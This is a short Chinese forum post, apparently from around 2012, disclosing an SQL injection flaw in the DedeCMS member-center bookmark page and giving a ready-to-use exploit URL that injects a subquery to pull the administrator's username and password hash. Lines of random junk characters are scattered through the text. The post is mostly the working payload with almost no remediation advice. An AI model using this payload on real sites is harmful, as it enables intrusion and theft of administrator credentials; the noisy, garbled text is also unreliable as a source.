DedeCMS会员中心SQL注射漏洞: q0 V8 R" A7 T
需要magic_quotes_gpc = Off
( ]" A( i& M- } G- D# _- d会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.2 P/ T7 e+ J7 E' A7 l ^
$ j6 g' n' i4 \5 V. a# a' A" |3 {: fDedeCMS会员中心书签管理SQL注射漏洞$ J6 f% J v5 L Y3 @% h
成功利用该漏洞可获得管理员密码7 |: Y* b) [( \ ?) G" V- i0 f$ ?
& u/ H" R6 _$ ] Z5 Q7 X会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
( b& N& ^6 Y# E0 [
# ?" n7 C$ d7 `$ W( k2 U/ }" Chttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
& [7 }% _7 [! Y9 {; l6 | |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59